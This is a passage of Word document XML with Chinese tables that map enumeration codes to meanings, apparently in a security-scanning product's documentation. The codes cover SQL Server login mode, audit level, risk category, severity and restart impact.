              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="264079DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7A7C264C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="338938D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginModel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3255EA31" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25063717" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Windows模式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6024A36B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07D6339D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginModel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F86C735" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3095066F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>SQLServer和Windows模式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="789E2A91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="280" w:name="windows-sql-server审核级别"/>
      <w:bookmarkEnd w:id="279"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>windows SQL Server审核级别</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1204"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1791"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="19233A5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6D3EFB0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B9F2C3E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="547149A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1B6FC72A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77824863" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>auditLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C1FF8EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="519D526C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1A86828B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A384623" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>auditLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BE7892D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C8662BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>仅限成功的登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="165ED186" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="354AC379" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>auditLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1039BC8C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1202F432" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>仅限失败的登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="05A7704C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E98AD5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>auditLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="523F9EA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DB64CA6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>失败和成功的登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="038BCDFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="281" w:name="风险类型"/>
      <w:bookmarkEnd w:id="280"/>
      <w:r>
        <w:t>风险类型</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="809"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2219179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569DCC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69472916" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A0021AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3AF61EA9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37AB77C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="481E679B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51797123" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>补丁</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3357B3AE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F031629" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0475D16E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36F014B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>对外访问性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="31839D54" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4694F613" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BB104E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3115EF21" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>安全配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="219F7266" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21377F47" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="691A7F83" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="389AB1B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>POC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1C4973AB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CF47523" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="493EC7DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08861E6A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>弱密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="06F7897A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48E73293" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="688C07DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F16C103" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4732BA6D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6161CAAF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FA992B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="276E229D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>账号风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0026B5D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="282" w:name="危险程度"/>
      <w:bookmarkEnd w:id="281"/>
      <w:r>
        <w:t>危险程度</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="951"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3C91CC1C"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81A2B67" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F0000C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E2A01BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1603F73D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40503234" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FA2BB2C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00F36F5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="58E8BE69" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31309855" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3050CA90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2677B1B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>低危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="19684497" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73DDA1F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="189A69FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76E063F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>中危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6BC1F0F2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="501C1585" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60725FCA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ED1A55F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="635C63BC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A45600A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2282174F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73C4E399" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>危急</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A6B0693" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="283" w:name="修复影响"/>
      <w:bookmarkEnd w:id="282"/>
      <w:r>
        <w:t>修复影响</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1275"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4E900DC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6E82918" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="337D4294" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="676FFED5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5CCD9A1C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="076CF09F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>restartOpts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7957C41F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="370BDA97" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>未知</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="58294682" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="569E1A68" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>restartOpts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
